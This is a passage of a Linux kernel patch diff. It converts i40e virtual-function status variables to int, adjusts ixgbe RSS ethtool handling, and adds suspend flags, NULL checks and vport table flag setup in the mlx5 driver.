+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2308,10 +2308,10 @@ static int i40e_vc_config_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_pair_info *qpi;
+ 	u16 vsi_id, vsi_queue_id = 0;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	int i, j = 0, idx = 0;
+ 	struct i40e_vsi *vsi;
+ 	u16 num_qps_all = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2458,8 +2458,8 @@ static int i40e_vc_config_irq_map_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_irq_map_info *irqmap_info =
+ 	    (struct virtchnl_irq_map_info *)msg;
+ 	struct virtchnl_vector_map *map;
++	int aq_ret = 0;
+ 	u16 vsi_id;
+-	i40e_status aq_ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -2574,7 +2574,7 @@ static int i40e_vc_enable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_select *vqs =
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states)) {
+@@ -2632,7 +2632,7 @@ static int i40e_vc_disable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_select *vqs =
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2783,7 +2783,7 @@ static int i40e_vc_get_stats_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_eth_stats stats;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	struct i40e_vsi *vsi;
+ 
+ 	memset(&stats, 0, sizeof(struct i40e_eth_stats));
+@@ -2926,7 +2926,7 @@ static int i40e_vc_add_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_ether_addr_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -2998,7 +2998,7 @@ static int i40e_vc_del_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 	bool was_unimac_deleted = false;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3071,7 +3071,7 @@ static int i40e_vc_add_vlan_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_vlan_filter_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if ((vf->num_vlan >= I40E_VC_MAX_VLAN_PER_VF) &&
+@@ -3142,7 +3142,7 @@ static int i40e_vc_remove_vlan_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_vlan_filter_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3198,7 +3198,7 @@ static int i40e_vc_iwarp_msg(struct i40e_vf *vf, u8 *msg, u16 msglen)
+ {
+ 	struct i40e_pf *pf = vf->pf;
+ 	int abs_vf_id = vf->vf_id + pf->hw.func_caps.vf_base_id;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states) ||
+ 	    !test_bit(I40E_VF_STATE_IWARPENA, &vf->vf_states)) {
+@@ -3227,7 +3227,7 @@ static int i40e_vc_iwarp_qvmap_msg(struct i40e_vf *vf, u8 *msg, bool config)
+ {
+ 	struct virtchnl_iwarp_qvlist_info *qvlist_info =
+ 				(struct virtchnl_iwarp_qvlist_info *)msg;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states) ||
+ 	    !test_bit(I40E_VF_STATE_IWARPENA, &vf->vf_states)) {
+@@ -3263,7 +3263,7 @@ static int i40e_vc_config_rss_key(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_key *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+ 	    !i40e_vc_isvalid_vsi_id(vf, vrk->vsi_id) ||
+@@ -3293,7 +3293,7 @@ static int i40e_vc_config_rss_lut(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_lut *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	u16 i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3328,7 +3328,7 @@ static int i40e_vc_get_rss_hena(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct virtchnl_rss_hena *vrh = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int len = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3365,7 +3365,7 @@ static int i40e_vc_set_rss_hena(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_hena *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3389,8 +3389,8 @@ err:
+  **/
+ static int i40e_vc_enable_vlan_stripping(struct i40e_vf *vf, u8 *msg)
+ {
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3415,8 +3415,8 @@ err:
+  **/
+ static int i40e_vc_disable_vlan_stripping(struct i40e_vf *vf, u8 *msg)
+ {
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3615,8 +3615,8 @@ static void i40e_del_all_cloud_filters(struct i40e_vf *vf)
+ 			ret = i40e_add_del_cloud_filter(vsi, cfilter, false);
+ 		if (ret)
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d: Failed to delete cloud filter, err %s aq_err %s\n",
+-				vf->vf_id, i40e_stat_str(&pf->hw, ret),
++				"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
++				vf->vf_id, ret,
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 
+@@ -3642,7 +3642,7 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+ 	struct hlist_node *node;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i, ret;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3718,8 +3718,8 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, &cfilter, false);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to delete cloud filter, err %s aq_err %s\n",
+-			vf->vf_id, i40e_stat_str(&pf->hw, ret),
++			"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
++			vf->vf_id, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err;
+ 	}
+@@ -3773,7 +3773,7 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_cloud_filter *cfilter = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i, ret;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3852,8 +3852,8 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, cfilter, true);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to add cloud filter, err %s aq_err %s\n",
+-			vf->vf_id, i40e_stat_str(&pf->hw, ret),
++			"VF %d: Failed to add cloud filter, err %d aq_err %s\n",
++			vf->vf_id, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err_free;
+ 	}
+@@ -3882,7 +3882,7 @@ static int i40e_vc_add_qch_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_link_status *ls = &pf->hw.phy.link_info;
+ 	int i, adq_request_qps = 0;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	u64 speed = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3994,7 +3994,7 @@ err:
+ static int i40e_vc_del_qch_msg(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+index e88e3dfac8c21..0051aa676e19e 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+@@ -2634,6 +2634,14 @@ static int ixgbe_get_rss_hash_opts(struct ixgbe_adapter *adapter,
+ 	return 0;
+ }
+ 
++static int ixgbe_rss_indir_tbl_max(struct ixgbe_adapter *adapter)
++{
++	if (adapter->hw.mac.type < ixgbe_mac_X550)
++		return 16;
++	else
++		return 64;
++}
++
+ static int ixgbe_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd,
+ 			   u32 *rule_locs)
+ {
+@@ -2642,7 +2650,8 @@ static int ixgbe_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd,
+ 
+ 	switch (cmd->cmd) {
+ 	case ETHTOOL_GRXRINGS:
+-		cmd->data = adapter->num_rx_queues;
++		cmd->data = min_t(int, adapter->num_rx_queues,
++				  ixgbe_rss_indir_tbl_max(adapter));
+ 		ret = 0;
+ 		break;
+ 	case ETHTOOL_GRXCLSRLCNT:
+@@ -3044,14 +3053,6 @@ static int ixgbe_set_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd)
+ 	return ret;
+ }
+ 
+-static int ixgbe_rss_indir_tbl_max(struct ixgbe_adapter *adapter)
+-{
+-	if (adapter->hw.mac.type < ixgbe_mac_X550)
+-		return 16;
+-	else
+-		return 64;
+-}
+-
+ static u32 ixgbe_get_rxfh_key_size(struct net_device *netdev)
+ {
+ 	return IXGBE_RSS_KEY_SIZE;
+@@ -3100,8 +3101,8 @@ static int ixgbe_set_rxfh(struct net_device *netdev, const u32 *indir,
+ 	int i;
+ 	u32 reta_entries = ixgbe_rss_indir_tbl_entries(adapter);
+ 
+-	if (hfunc)
+-		return -EINVAL;
++	if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)
++		return -EOPNOTSUPP;
+ 
+ 	/* Fill out the redirection table */
+ 	if (indir) {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dev.c b/drivers/net/ethernet/mellanox/mlx5/core/dev.c
+index 0571e40c6ee5f..02bb9d43ff9c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/dev.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/dev.c
+@@ -396,7 +396,7 @@ int mlx5_attach_device(struct mlx5_core_dev *dev)
+ 	return ret;
+ }
+ 
+-void mlx5_detach_device(struct mlx5_core_dev *dev)
++void mlx5_detach_device(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	struct mlx5_priv *priv = &dev->priv;
+ 	struct auxiliary_device *adev;
+@@ -426,7 +426,7 @@ void mlx5_detach_device(struct mlx5_core_dev *dev)
+ 
+ 		adrv = to_auxiliary_drv(adev->dev.driver);
+ 
+-		if (adrv->suspend) {
++		if (adrv->suspend && suspend) {
+ 			adrv->suspend(adev, pm);
+ 			continue;
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+index 97e9ec44a759b..3749eb83d9e53 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+@@ -108,7 +108,7 @@ static int mlx5_devlink_reload_fw_activate(struct devlink *devlink, struct netli
+ 	if (err)
+ 		return err;
+ 
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, true);
+ 	err = mlx5_health_wait_pci_up(dev);
+ 	if (err)
+ 		NL_SET_ERR_MSG_MOD(extack, "FW activate aborted, PCI reads fail after reset");
+@@ -166,7 +166,7 @@ static int mlx5_devlink_reload_down(struct devlink *devlink, bool netns_change,
+ 
+ 	switch (action) {
+ 	case DEVLINK_RELOAD_ACTION_DRIVER_REINIT:
+-		mlx5_unload_one_devl_locked(dev);
++		mlx5_unload_one_devl_locked(dev, false);
+ 		break;
+ 	case DEVLINK_RELOAD_ACTION_FW_ACTIVATE:
+ 		if (limit == DEVLINK_RELOAD_LIMIT_NO_RESET)
+@@ -200,7 +200,7 @@ static int mlx5_devlink_reload_up(struct devlink *devlink, enum devlink_reload_a
+ 			break;
+ 		/* On fw_activate action, also driver is reloaded and reinit performed */
+ 		*actions_performed |= BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT);
+-		ret = mlx5_load_one_devl_locked(dev, false);
++		ret = mlx5_load_one_devl_locked(dev, true);
+ 		break;
+ 	default:
+ 		/* Unsupported action should not get to this function */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
+index 4e48946c4c2ac..0290e0dea5390 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
+@@ -106,22 +106,17 @@ err_rule:
+ }
+ 
+ struct mlx5e_post_act_handle *
+-mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *attr)
++mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *post_attr)
+ {
+-	u32 attr_sz = ns_to_attr_sz(post_act->ns_type);
+ 	struct mlx5e_post_act_handle *handle;
+-	struct mlx5_flow_attr *post_attr;
+ 	int err;
+ 
+ 	handle = kzalloc(sizeof(*handle), GFP_KERNEL);
+-	post_attr = mlx5_alloc_flow_attr(post_act->ns_type);
+-	if (!handle || !post_attr) {
+-		kfree(post_attr);
++	if (!handle) {
+ 		kfree(handle);
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+ 
+-	memcpy(post_attr, attr, attr_sz);
+ 	post_attr->chain = 0;
+ 	post_attr->prio = 0;
+ 	post_attr->ft = post_act->ft;
+@@ -145,7 +140,6 @@ mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *at
+ 	return handle;
+ 
+ err_xarray:
+-	kfree(post_attr);
+ 	kfree(handle);
+ 	return ERR_PTR(err);
+ }
+@@ -164,7 +158,6 @@ mlx5e_tc_post_act_del(struct mlx5e_post_act *post_act, struct mlx5e_post_act_han
+ 	if (!IS_ERR_OR_NULL(handle->rule))
+ 		mlx5e_tc_post_act_unoffload(post_act, handle);
+ 	xa_erase(&post_act->ids, handle->id);
+-	kfree(handle->attr);
+ 	kfree(handle);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
+index f476774c0b75d..40b8df184af51 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
+@@ -19,7 +19,7 @@ void
+ mlx5e_tc_post_act_destroy(struct mlx5e_post_act *post_act);
+ 
+ struct mlx5e_post_act_handle *
+-mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *attr);
++mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *post_attr);
+ 
+ void
+ mlx5e_tc_post_act_del(struct mlx5e_post_act *post_act, struct mlx5e_post_act_handle *handle);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+index f2c2c752bd1c3..c57b097275241 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+@@ -14,10 +14,10 @@
+ 
+ #define MLX5_ESW_VPORT_TBL_SIZE_SAMPLE (64 * 1024)
+ 
+-static const struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_sample_ns = {
++static struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_sample_ns = {
+ 	.max_fte = MLX5_ESW_VPORT_TBL_SIZE_SAMPLE,
+ 	.max_num_groups = 0,    /* default num of groups */
+-	.flags = MLX5_FLOW_TABLE_TUNNEL_EN_REFORMAT | MLX5_FLOW_TABLE_TUNNEL_EN_DECAP,
++	.flags = 0,
+ };
+ 
+ struct mlx5e_tc_psample {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+index 7cd36f4ac3efc..eba601487eb79 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+@@ -776,6 +776,7 @@ static int mlx5e_create_promisc_table(struct mlx5e_flow_steering *fs)
+ 	ft->t = mlx5_create_auto_grouped_flow_table(fs->ns, &ft_attr);
+ 	if (IS_ERR(ft->t)) {
+ 		err = PTR_ERR(ft->t);
++		ft->t = NULL;
+ 		fs_err(fs, "fail to create promisc table err=%d\n", err);
+ 		return err;
+ 	}
+@@ -803,7 +804,7 @@ static void mlx5e_del_promisc_rule(struct mlx5e_flow_steering *fs)
+ 
+ static void mlx5e_destroy_promisc_table(struct mlx5e_flow_steering *fs)
+ {
+-	if (WARN(!fs->promisc.ft.t, "Trying to remove non-existing promiscuous table"))
++	if (!fs->promisc.ft.t)
+ 		return;
+ 	mlx5e_del_promisc_rule(fs);
+ 	mlx5_destroy_flow_table(fs->promisc.ft.t);
+@@ -1471,6 +1472,8 @@ err:
+ 
+ void mlx5e_fs_cleanup(struct mlx5e_flow_steering *fs)
+ {
++	if (!fs)
++		return;
+ 	mlx5e_fs_ethtool_free(fs);
+ 	mlx5e_fs_tc_free(fs);
+ 	mlx5e_fs_vlan_free(fs);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 5e01de4c32037..94d010e2d5efd 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5201,6 +5201,7 @@ static void mlx5e_nic_cleanup(struct mlx5e_priv *priv)
+ 	mlx5e_ktls_cleanup(priv);
+ 	mlx5e_ipsec_cleanup(priv);
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ }
+ 
+ static int mlx5e_init_nic_rx(struct mlx5e_priv *priv)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 0f744131c6869..9bd1a93a512d4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -783,6 +783,7 @@ static void mlx5e_cleanup_rep(struct mlx5e_priv *priv)
+ {
+ 	mlx5e_fs_cleanup(priv->fs);
+ 	mlx5e_ipsec_cleanup(priv);
++	priv->fs = NULL;
+ }
+ 
+ static int mlx5e_create_rep_ttc_table(struct mlx5e_priv *priv)
+@@ -949,6 +950,7 @@ err_close_drop_rq:
+ 	priv->rx_res = NULL;
+ err_free_fs:
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
+index 9e72118f2e4c0..749c3957a1280 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
+@@ -11,7 +11,7 @@ struct mlx5_vport_key {
+ 	u16 prio;
+ 	u16 vport;
+ 	u16 vhca_id;
+-	const struct esw_vport_tbl_namespace *vport_ns;
++	struct esw_vport_tbl_namespace *vport_ns;
+ } __packed;
+ 
+ struct mlx5_vport_table {
+@@ -21,6 +21,14 @@ struct mlx5_vport_table {
+ 	struct mlx5_vport_key key;
+ };
+ 
++static void
++esw_vport_tbl_init(struct mlx5_eswitch *esw, struct esw_vport_tbl_namespace *ns)
++{
++	if (esw->offloads.encap != DEVLINK_ESWITCH_ENCAP_MODE_NONE)
++		ns->flags |= (MLX5_FLOW_TABLE_TUNNEL_EN_REFORMAT |
++			      MLX5_FLOW_TABLE_TUNNEL_EN_DECAP);
++}
++
+ static struct mlx5_flow_table *
+ esw_vport_tbl_create(struct mlx5_eswitch *esw, struct mlx5_flow_namespace *ns,
+ 		     const struct esw_vport_tbl_namespace *vport_ns)
+@@ -80,6 +88,7 @@ mlx5_esw_vporttbl_get(struct mlx5_eswitch *esw, struct mlx5_vport_tbl_attr *attr
+ 	u32 hkey;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.vports.lock);
++	esw_vport_tbl_init(esw, attr->vport_ns);
+ 	hkey = flow_attr_to_vport_key(esw, attr, &skey);
+ 	e = esw_vport_tbl_lookup(esw, &skey, hkey);
+ 	if (e) {
+@@ -127,6 +136,7 @@ mlx5_esw_vporttbl_put(struct mlx5_eswitch *esw, struct mlx5_vport_tbl_attr *attr
+ 	u32 hkey;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.vports.lock);
++	esw_vport_tbl_init(esw, attr->vport_ns);
+ 	hkey = flow_attr_to_vport_key(esw, attr, &key);
+ 	e = esw_vport_tbl_lookup(esw, &key, hkey);
+ 	if (!e || --e->num_rules)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 5db76af35d3f5..6e6e0864063f1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -668,7 +668,7 @@ struct mlx5_vport_tbl_attr {
+ 	u32 chain;
+ 	u16 prio;
+ 	u16 vport;
+-	const struct esw_vport_tbl_namespace *vport_ns;
++	struct esw_vport_tbl_namespace *vport_ns;
+ };
+ 
+ struct mlx5_flow_table *
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 64e5b9f29206e..519526a4810ef 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -72,7 +72,7 @@
+ 
+ #define MLX5_ESW_FT_OFFLOADS_DROP_RULE (1)
+ 
+-static const struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_mirror_ns = {
++static struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_mirror_ns = {
+ 	.max_fte = MLX5_ESW_VPORT_TBL_SIZE,
+ 	.max_num_groups = MLX5_ESW_VPORT_TBL_NUM_GROUPS,
+ 	.flags = 0,
+@@ -733,7 +733,6 @@ mlx5_eswitch_add_fwd_rule(struct mlx5_eswitch *esw,
+ 	kfree(dest);
+ 	return rule;
+ err_chain_src_rewrite:
+-	esw_put_dest_tables_loop(esw, attr, 0, i);
+ 	mlx5_esw_vporttbl_put(esw, &fwd_attr);
+ err_get_fwd:
+ 	mlx5_chains_put_table(chains, attr->chain, attr->prio, 0);
+@@ -776,7 +775,6 @@ __mlx5_eswitch_del_rule(struct mlx5_eswitch *esw,
+ 	if (fwd_rule)  {
+ 		mlx5_esw_vporttbl_put(esw, &fwd_attr);
+ 		mlx5_chains_put_table(chains, attr->chain, attr->prio, 0);
+-		esw_put_dest_tables_loop(esw, attr, 0, esw_attr->split_count);
+ 	} else {
+ 		if (split)
+ 			mlx5_esw_vporttbl_put(esw, &fwd_attr);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+index 1e46f9afa40e0..d219f8417d93a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+@@ -150,11 +150,11 @@ static void mlx5_fw_reset_complete_reload(struct mlx5_core_dev *dev)
+ 	if (test_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags)) {
+ 		complete(&fw_reset->done);
+ 	} else {
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 		if (mlx5_health_wait_pci_up(dev))
+ 			mlx5_core_err(dev, "reset reload flow aborted, PCI reads still not working\n");
+ 		else
+-			mlx5_load_one(dev, false);
++			mlx5_load_one(dev, true);
+ 		devlink_remote_reload_actions_performed(priv_to_devlink(dev), 0,
+ 							BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT) |
+ 							BIT(DEVLINK_RELOAD_ACTION_FW_ACTIVATE));
+@@ -484,8 +484,8 @@ int mlx5_fw_reset_wait_reset_done(struct mlx5_core_dev *dev)
+ 	}
+ 	err = fw_reset->ret;
+ 	if (test_and_clear_bit(MLX5_FW_RESET_FLAGS_RELOAD_REQUIRED, &fw_reset->reset_flags)) {
+-		mlx5_unload_one_devl_locked(dev);
+-		mlx5_load_one_devl_locked(dev, false);
++		mlx5_unload_one_devl_locked(dev, false);
++		mlx5_load_one_devl_locked(dev, true);
+ 	}
+ out:
+ 	clear_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index 879555ba847dd..e42e4ac231c64 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -699,7 +699,7 @@ static void mlx5_fw_fatal_reporter_err_work(struct work_struct *work)
+ 		 * requests from the kernel.
+ 		 */
+ 		mlx5_core_err(dev, "Driver is in error state. Unloading\n");
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 59914f66857da..cc8057c4f9080 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1495,12 +1495,12 @@ int mlx5_load_one(struct mlx5_core_dev *dev, bool recovery)
+ 	return ret;
+ }
+ 
+-void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev)
++void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	devl_assert_locked(priv_to_devlink(dev));
+ 	mutex_lock(&dev->intf_state_mutex);
+ 
